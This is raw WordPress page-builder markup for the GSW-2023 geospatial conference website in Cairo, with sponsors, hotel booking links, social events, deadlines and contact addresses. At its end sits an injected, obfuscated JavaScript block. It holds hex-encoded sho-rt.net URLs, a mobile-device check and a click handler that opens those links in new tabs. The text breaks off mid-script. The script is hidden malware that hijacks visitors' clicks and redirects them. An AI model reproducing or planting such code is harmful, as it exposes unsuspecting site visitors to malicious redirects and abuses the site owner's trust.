rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 